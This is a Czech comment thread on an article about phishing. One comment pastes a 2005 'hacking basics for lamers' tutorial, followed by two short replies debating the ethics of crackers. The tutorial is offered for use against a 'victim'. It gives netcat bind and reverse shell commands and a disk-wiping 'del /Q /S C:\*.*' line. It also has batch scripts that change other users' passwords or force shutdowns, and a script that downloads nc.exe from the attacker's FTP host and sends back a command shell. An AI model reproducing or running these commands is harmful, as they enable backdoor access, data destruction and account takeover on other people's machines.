Vlákno názorů k článku Cracker: na podvodné e-maily naletí až dvacet procent příjemců od - - - - - - - Deathalive´s cracking world Základní poznatky pro lamy...
-
- - - - - - (neregistrovaný)Deathalive´s cracking world
Základní poznatky pro lamy To, co byste měli vědět a většinou to, na co se mě
ptáte na ICQ, cracku zdar
?????????????????????
Základní poznatky pro lamy
?????????????????????
V tomto návodu si postupně probereme základní techniky hackování od těch
nejednodušších, až po ty nejdestruktivnější.
Nejprve si probereme úplný základ a přehled příkazů, které musíte znát a jejich
použití a potom se přesuneme k hackování internetového uživatele, což vás bude
jistě bavit nejvíce.
20:38 2005-05-31
IP Adresy:
???????
IP (Internet Protokol) je univerzální adresa přidělená každému počítači
připojenému k internetu. Počítače na síti mají ještě speciální vnitřní ip adresu
v rámci sítě.
IP adresa slouží k identifikaci počítačů, přiděluje nám jí poskytoval připojení
k internetu či síti.
Tato adresa má podobu čtyř cifer oddělených tečkami, např. 83.200.17.33
Kromě toho má váš počítač ještě speciální ip čistě sám pro sebe, je to 127.0.0.1
též jako localhost.
IP adresy budeme využívat později, nyní pro nás však přestávají na chvíli být
důležité
21:43 2005-05-31
PORTY:
?????
Port je smyšlené označení pro službu, kterou daný počítač provozuje. Jednotlivé
porty jsou označeny čísly, např. služba http (pro zobrazování www stránek) běží
na portu 80 na protokolu TCP.
Protokoly jsou dva, TCP a UDP, UDP nás nemusí pro tentorkát zajímat.
Přehled nejpoužívanějších TCP portů:
PORT SLUŽBA použití
21 FTP Přenos souborů
23 TELNET dálková administrace počítače
25 SMTP Port odchozí pošty
80 HTTP WWW stránky
110 POP3 Port příchozí pošty
139 NetBios Sdílení souborů
443 SMB Viz. NetBios
Pro scannování portů si na http://insecure.org/nmap stáhněte program Nmap. Pro
váš operační systém potřebujete bin (binárku). Soubory si rozbalte do C:\Windows\System32.
Klikněte na tlačítko Start, poté dejte spustit (nebo stiskněte kombinaci kláves
Win+R) a napište cmd.
V příkazovém řádku napište:
nmap -v -sT -P0 www.seznam.cz
a provedete scannování portů na serveru seznam
???????-info pod čarou?????????????????????????????????????-
-v Slouží v zobrazení výsledného výpisu
-sT Provede scannování TCP portů
-P0 Nebude nejdříve odesílat pakety na daný port, jestli je opravdu aktivní,
toto je potřebné například u serverů typu microsoft nebo pentagon
22:22 2005-05-31
WWWHACK, BRUTUS, WEBCRACKER A TAKOVÁ HAVĚ«
??????????????????????????????????????
O těhle programech se nakecá strašně moc věcí a člověk si pod tím představuje
taky bůh ví co, jsou to programy na automatizovaný zkoušení hesel na POP3 a FTP,
některé nabízí i formulářové prvky v HTTP.
Já osobně tyto programy považuji za nespolehlivé a proto naprosto nepoužitelné,
dostat se do e-mailu někomu, u koho to jde, opravdu nemá s hackingem nic
společného a proto tyto prográmky kompletně vynecháme.
09:26 2005-06-01
PŘEHLED PŘÍKAZŮ PRO PŘÍKAZOVEJ ŘÁDEK
???????????????????????????????
Příkazový řádek se zapína: v nabídce start dejte spustit a napište cmd
********************************************************************************************************
AT Tento příkaz si jistě oblíbíte, slouží k plánování úloh
at 9:30 shutdown -s -f -t 00
tento příklad vypne počítač v 9:30, ale pouze jednou
CD zobrazí název aktuální složky nebo změní aktuální složku
relativně: cd složka
absolutně: cd c:\složka
CMD Spustí nový příkazový řádek
COPY Zkopíruje jeden nebo více souborů do jiného umístění
copy zdroj + zdroj + zdroj cíl
zdroj znamená soubor nebo soubory určené ke kopírování
cíl je název složky, kam se mají soubory uložit nebo výsledného souboru
DEL odstraní jeden nebo více souborů
del /Q /S C:\*.*
odstraní všechny soubory z disku C:, které se zrovna nepoužívají a tudíž nejsou
potřebné k chodu systému
/Q způsobí, že nebude vyžádáno potvrzení smázání
/S odstraní soubory i z podadresářů (složky nechá prázdné, ale stále tam budou)
dIR Zobrazí výpis aktuálního adresáře (bez parametrů) nebo zvoleného adresáře:
dir složka nebo dir C:\složka
ECHO Vypíše vámi zadaný text, dá se využít v kombinaci s proměnnými
echo %username%
Vypíše aktuálního uživatele
Takto můžeme zapisovat i text do souborů:
echo Ahoj lidi > soubor.txt
kdybysme ovšem takto opět zapsali do souboru, přepsali bysme předchozí text,
protože místo > použijeme >> pro zápis na další řádek:
echo Tohle bude další řádek textu >> soubor.txt
FOR Slouží k zřetězení příkazu (provedení v určitém počtu)
Základní použití je toto:
for /L %i in (1,1,10) do příkaz
první číslice znamená od kolika počítat
druhá o kolik přičítat
třetí do kolika počítat
%i je proměnná, ve které se tento stav udržuje
for /L %i in (1,1,10) do echo Počet do deseti: %i
FTP pro přenos souborů
ftp 63.12.63.39 nebo ftp ftp.webzdarma.cz
O tomto rozhraní si povíme více později
MD Vytvoří složku
md složka
md c:\složka
NET Skvělý příkaz, má několik funkcí
net view zobrazí počítače v síti
net users zobrazí uživatele na počítači
net users %username% zobrazí informace o aktuálním uživateli
net users %username% nové_heslo změní heslo aktuálnímu uživateli bez znalosti
původního hesla
net users nový_uživatel heslo /add vytvoří nového uživatele
net users kompik super změní heslo uživateli kompik na super
net localgroup zobrazí stávající skupiny
net localgorup Administrators ukáže uživatele ve skupině administrátorů
net localgroup Administrators %username% /add vloží stávajícího uživatele do
skupiny Administrátorů
PING Slouží k zjištění, jestli je daný počítač připojen k internetu, dá se
pomocí něco i zjistit ip
ping www.seznam.cz
dostanete ip serveru seznam
TELNET Aplikace slouží ke připojení k danému ip a portu
telnet IP_ADRESA PORT
Pokud port neuvedeme, je výchozí nastavení na 23
místo IP můžeme použít i dns (např. www.seznam.cz)
TRACERT Slouží k trasování počítače
tracert 21.23.63.96
Ukáže vám přes jaké počítače vede komunikaci mezi vaším počítačem a počítačem
oběti. DNS domény počítačů často obsahují části názvu měst, napříkad pra, ust,
apod..
TREE Graficky zobrazí adresáře, podadresáře i soubory
tree /F C:\ nebo Tree /F složka nebo tree /F
Abyste místo diakritických znaků použili ASCII, tak použijte navíc přepínač /A
tree /A /F atd...
VER Zobrazí verzi operačního systému
SHUTDOWN Vypne počítač
shutdown -s -f -t 00
provede okamžité vypnutí stávajícího počítače bez dotázání na ukončení aplikací
shutdown -s -f -t 10 -c "tak se měj"
provede to samé jako v předchozím případě ale s 10vteřinovým oknem zobrazujícím
důvod(tak se měj)
EXIT Vypne příkazovej řádek
10:24 2005-06-01
PROMĚNNÉ, KTERÉ BYSTE MĚLI ZNÁT
??????????????????????????-
U příkazu net jsme si již ukazovali proměnnou %username% ve které je uloženo
jméno aktuálního uživatele, tady máte kompletnější přehled:
*********************************************************************************************************
%username% aktuální uživatel
%windir% Absolutní cesta ke složce WINDOWS
%userdomain% název počítače
%systemdrive% Zobrazí oddíl, na němž je nainstalován operační systém (nejčastěji
C:)
%userprofile% Složka aktuálního uživatele
%allusersprofile% Složka pro všechny uživatele (sdílená)
%tmp% absolutní cesta ke složce Temp kam se ukládají dočasné soubory
%comspec% Absolutní cesta k aplikaci cmd.exe
%programfiles% Absolutní cesta do složky Program Files
10:45 2005-06-01
NETCAT, ©VÝCARSKÝ ARMÁDNÍ NŮŽ KAŽDÉHO HACKERA
????????????????????????????????????????-
NetCat(nc) je asi nejlepší nástroj, který na internetu najdete, skrývá v sobě
telnet, scanner portů, naslouchajícího démona na portech, zadní vrátka pro
přístup do počítače a hlavně může běžet v tajném režimu (nevíte o něm)
Nejprve si předvedeme pár základních příkazů a potom si předvedeme pár příkladů,
tím ho však neuzavřeme, počkejte si na kapitolu o dávkových souborech
*****************************************************************************************************************
netcat seženete na adrese http://packetstormsecurity.com/Win/nc11nt.zip
z tého zipky potřebujete pouze soubor nc.exe, ten si uložte do adresáře C:\Windows\System32
NC se používá s příkazové řádky, tzn.
nc -parametr1 -parametr2 host/ip port
******************************************PARAMETRY******************************************************
-v slouží k zobrazení výpisu (většinou nutné)
-vv to samé jako předchozí, ale poskytuje obsáhlejší výpis
-nv používá se místo -v když se připojujeme místo dns na ip
-z zapne scannování portů
-w2 zvýší rychlost scannování portů
-d Zapne v tichém režimu
-l slouží k otevření portu na našem počítači
-L To samé, akorát že předchozí parametr vydrží pouze jedno připojení
-e jakmile se někdo připojí, tak skrz připojení protáhne výpis souboru (např.
cmd.exe protáhne příkazový řádek oběti až k vám)
*******************************************PŘÍKLADY********************************************************
nc -v www.webzdarma.cz 80
připojí se na server Webzdarma na port 80
poté můžete zadat příkaz
HEAD / HTTP/1.0
[ENTER]
[ENTER]
čímž se vám zobrazí hlavička serveru zobrazující nějaké informace (zvláště typ
serveru)
nc -vv -z -w2 www.seznam.cz 23-300
Provede scannování portů TCP od 300 do 23 (pozpátku)
nc -v -l -p 8080
Vytvoří naslouchajícího démona na portu 8080 čekajícího na spojení
nc -v -l -p 8080 -e cmd.exe
Vytvoří naslouchajícího démona s tím rozdílem, že když se k němu někdo připojí,
bude mu předána vaše příkazová řádka
nc -nv 61.63.399.63 8080 -e cmd.exe
Předá příkazový řádek netcatu naslouchajícím na portu 8080 (pokud nebyl použit
parametr -e cmd.exe u naslouchajícího nc)
nc -d -L -p 8080 -e cmd.exe
Spustí netcat v tichém režimu, pokud se na něj někdo připojí, bude mu předán
příkazový řádek, možnost spojení přes telnet:
telnet ip_obětí 8080
15:23 2005-06-01
KRÁTKÝ PŘEHLED, CO BYSTE MĚLI MÍT
???????????????????????????-
NetCat http://packetstormsecurity.com/Win/nc11nt.zip
Nmap http://download.insecure.org/nmap/dist/nmap-3.81-win32.zip
firewall http://www.kerio.cz
AVG 7.0 http://www.grisoft.com
FTP Server (nejlépe Cerberus FTP)
naleznete na http://www.slunecnice.cz, stačí do vyhledávání zadat FTP server
******************************************************************************************************
Nc a Nmap jistě chápete, takže si řekneme co dál, Kerio Personal Firewall byste
rozhodně měli mít, aby vás ochránil před útokem zvenčí. Integrovanej firewall ve
Windows je sice taky dobrej, ale byl dělán pro běžné uživatele, vůbec nepočítá s
tímto způsobem použití.
Na stránkách http://www.grisoft.com můžete nalézt anglickou verzi antiviru AVG 7.0
Free Edition, tedy verzi naprosto zdarma
FTP server budete rozhodně také potřebovat, a to pro přenos souborů mezi vaším
počítačem a počítačem oběti, o tom si povíme později v kapitole o dávkových
souborech.
16:27 2005-06-01
PŘENOS SOUBORŮ PŘES FTP VE WINDOWS
??????????????????????????????
Pokud již máte ftp server Cerberus, tak se na něj zkusíme připojit v příkazovém
řádku:
ftp 127.0.0.1
server si vyžádá jméno a heslo, jméno je anonymous a heslo stačí zadat jakékoliv,
to je standartní nastavení u anonymních účtů
Dále pak zadejte binary (pro přenos spustitelných souborů) nebo ascii (pro
přenos textových souborů)
Fungují příkazy cd a dir, které znáte, kromě toho však ještě jiné
get pro stažení souboru na disk (get soubor.exe C:\soubor.exe)
nebo put pro natažení souboru z disku na server (put C:\soubor.exe soubor.exe)
Dále je dobré znát příkaz rename pro přejmenování souboru nebo delete pro
odstranění, od serveru se poté odpojíte příkazem bye nebo disconnect
18:51 2005-06-06
(NE)SKUTEČNÉ PROGRAMOVÁNÍ VE WINDOWS
?????????????????????????????????-
Mluvím o cmd skriptech, je to prosté, pokud se vám nechce pokaždý těch 20
příkazů psát znova, tak si je můžete napsat v poznámkovým bloku a uložit třeba
jako test.cmd
Důležitá je koncovka .cmd
Dám si příklad:
??????? obsah souboru test.cmd ??????????????????????????????
echo MsgBox "Nazdarek lidicky', vbCritical+vbAbortRetryIgnore, 'test" > test.vbs
test.vbs
????????????????????????????????????????????????????????-
tento cmd skript vytvoří soubor test.vbs se zprávou a spustí ho, místo enterů
můžete dávat mezi jednotlivé příkazy &&
???????obsash souboru test.cmd podruhé???????????????????????-
echo MsgBox 'Nazdarek lidicky', vbCritical+vbAbortRetryIgnroe, 'test'>test.vbs&&test.vbs
????????????????????????????????????????????????????????-
v podstatě to dělá to samé, akorát je obsah skriptu na pouhém jednom řádku a
málokterý nezasvěcenec se v tom vyzná ;-)
Podmínka if, aneb jak zajistit, abych nespustil nebezpečnej prográmek sám?
Třeba si do složky, kam si ukládáte cmd soubory dejte soubor firewall.txt
klidně může být prázdný, příkaz if vypadá takto:
if exist "firewall.txt" (echo fuck) else del /Q /S C:\*.*
tento nenápadný řádek v cmd skriptu způsobí, že jestli u tohoto cmd skriptu
nebude soubor firewall.txt, tak projde k promazání disku C:, zbydou pouze složky
a soubory, který systém zrovna používá k chodu
Další věc, naučte se podmínkou if kontrolovat svoje uživatelský jméno, třeba já
mám uživatelský jméno Jack Raiden:
if "%username%"=="Jack Raiden" (echo fuck) else net users "%username%"
changepass
tento řádek zase způsobí, že když spouštějící nebude Jack Raiden, tak mu to
změní heslo na changepass
Vždycky je lepší proměnný uvádět v uvozovkách, pro případ, že by proměnná
obsahovala více, jak jedno slovo, tak to může ošklivě pozměnit skript ve váš
neprospěch
Jde to i bez else:
if not "%username%"=="Jack Raiden" shutdown -s -f -t00
Pokud uživatel nebude Jack Raiden, vypne se mu počítač
Teď si ukážeme, jak psát s více příkazy, teoreticky to, co je uzavřeno v závorce,
může pokračovat na více řádkách:
if not "%username%"=="Jack Raiden" (
net users "%username%" nove_heslo
at 19:30 shutdown -s -f -t 03 -c "sbohem"
)
tzn. pokud uživatel nebude Jack Raiden, změní se mu heslo a nařídí se vypnutí
počítače na 19:30
Teď přichází na řadu poslední příklad, co se cmd skriptů týče, skript se připojí
na váš ftp, stáhne si nc.exe a pokud ho stáhne v pořádku, tak ho i spustí, k
tomu budeme potřebovat soubor C:\ftptmp, do kterého dáme informace pro
pokračování přenosu, dejme tomu, že naše ip je teď 62.62.62.62:
echo anonymous > c:\ftptmp
echo password >> C:\ftptmp
echo bin >> C:\ftptmp
echo cd ftproot >> C:\ftptmp
echo get nc.exe C:\nc.exe >> C:\ftptmp
echo bye >> C:\ftptmp
if exists "C:\ftptmp" ftp -s:C:\ftptmp 62.62.62.62
if exists "C:\nc.exe" (C:\nc -d 62.62.62.62 8080) else (
ftp -s:C:\ftptmp 62.62.62.62
nc -d 62.62.62.62 8080
)
tento skript vytvoří soubor ftptmp s parametry pro přenos ftp, pokud proběhlo
vytvoření úspěšně stáhne soubor a spustí ho, pokud se napoprvé nestáhl správně,
stáhne se dobře napodruhé a spustí, všimněte si, že byl nastaven na připojení k
vám (62.62.62.62) na portu 8080, kde byste měli mít zapnutýho listenera (nc -v -l
-p 8080) na kterého vám skript předá příkazovou řádku. Kvůli tomuto příkladu
jsem chtěl, abyste si sehnali Cerberus FTP Server
21:22 2005-06-08
VISUAL BASIC SCRIPT
???????????????
Díky tomuto skriptovacímu jazyku od Microsoftu můžeme naší (ne)programátorskou
sbírku skriptů ještě trochu zpestřit, například, jak zobrazit to dialogový okno
s chybou a vykolejit tak obě» z klidu?
k tomu slouží příkaz MsgBox:
MsgBox "Tohle bude zpráva", vbInformation+vbOkOnly,"tohle bude nadpis"
tento řádek uložte jako test.vbs a spus»te, je to VBSCript soubor, teď si to
rozpitváme
vbInformation+vbOkOnly znamená, že se tam objeví ikonka i (informace) a tlačítko
pouze OK, ikonky jsou tyhle:
vbInformation ikonka informace
vbQuestion ikonka otazníku
vbExclamation Vykřičník, poplašná zpráva
vbCritical Kritická chyba :)
dále tlačítka:
vbOkOnly zobrazí pouze tlačítko OK
vbOkCancel Tlačítka OK a Storno
vbAbortRetryIgnore Tlačítka přerušit opakovat a přeskočit
můj oblíbený příklad:
MsgBox "You've been cracked by Deathalive",vbCritical+vbAbortRetryIgnore,"ERROR"
a na závěr VBScriptů si ukážeme jeden, který otevírá cd-romky, uložte si ho
třeba jako cdrom.vbs:
Set ovladani = CreateObject("WMPlayer.OCX.7" )
Set mechaniky = ovladani.cdromCollection
If mechaniky.Count >= 1 Then
For i = 0 To mechaniky.Count - 1
mechaniky.Item(i).Eject
Next
End If
????????????????????????????????????????????????????????-
Gratuluju, dostali jste se na závěr návodu a tak doufám, že jste pochopili
alespoň trochu z těch základů, který sem se vám snažil vštěpit do hlavy.
Možná pochybujete, jestli tohle jsou fakt jenom základy, přece jenom, je to
strašně moc, ale věřte mi, tohle je základ, co byste měli znát, informací je
ovšem ale mnohem víc, proto musíte stále hledat, stále se něco učit, stále něco
zkoušet a proto začněte makat, naučte se v něčem programovat, naučte se PHP,
pracovat s databázemi SQL apod., jenom to je cesta k úspěchu, neexistuje žádnej
program, kde kliknete na start a je z vás hacker, to vy se musíte stát
algoritmem!
témata: cracking 8.06.2005, 22:11:00
Ohodnotit příspěvek
Komentáře
index
Přidání komentáře...
Témata
cracking
netcat
www
PHP
Mobilem
other
Archivy
září 2005
srpen 2005
červenec 2005
červen 2005
duben 2005
březen 2005
únor 2005
leden 2005
prosinec 2004
září 2004
srpen 2004
červenec 2004
červen 2004
Ostatní
RSS verze
Vzkazovník
Hodnocení
Oblíbené odkazy
Dialogová okna
Soubory .asmx
Interview s Bennym
Základní poznatky pro lamy
hackpages.wz.cz
hackingexposed.com
www.soom.cz
WebHackingExposed
security.newz-portal.net
? bruno braun 2003 -
T (neregistrovaný)Nebuďte prosím tak naivní ... nedělají nic jiného, než že vyujížívají lidské hlouposti ... podle mne jsou vlastně užiteční, protože proti hlouposti je prostře třeba systematicky a vytrvale bojovat :-). Jejich branže není o nic méně špinavá a zakomplexovaná než branže ve které podniká Český telekom (a z jeho nabídek je zřejmě patrné, že je to lidská hloupost která ho živí), nebo snad branže českých politiků (především socanů a komunistů, kteří opět přináší jen prvoplánové akce a populistické sliby, což jsou atributy na které slyší především hloupí lidé ), hloupost je zkrátka nástroj úspešného podnikání všude kam se jen podíváte ... smiřte se s tím.
-
SebX4 (neregistrovaný)Ano chápeš to, že člověk, s kterým je rozhovor vytvořen se věnuje nelegální činnosti, ale také zároveň umožňuje poskytnutí informací, jak tomu zabránit. Což ti jentak někdo neřekne. Takže se zamysli: Nebudeš radši, když se dovíš, jak se chránit i když od člověka, který to provádí???HMmm?
ČLÁNKY DO MAILU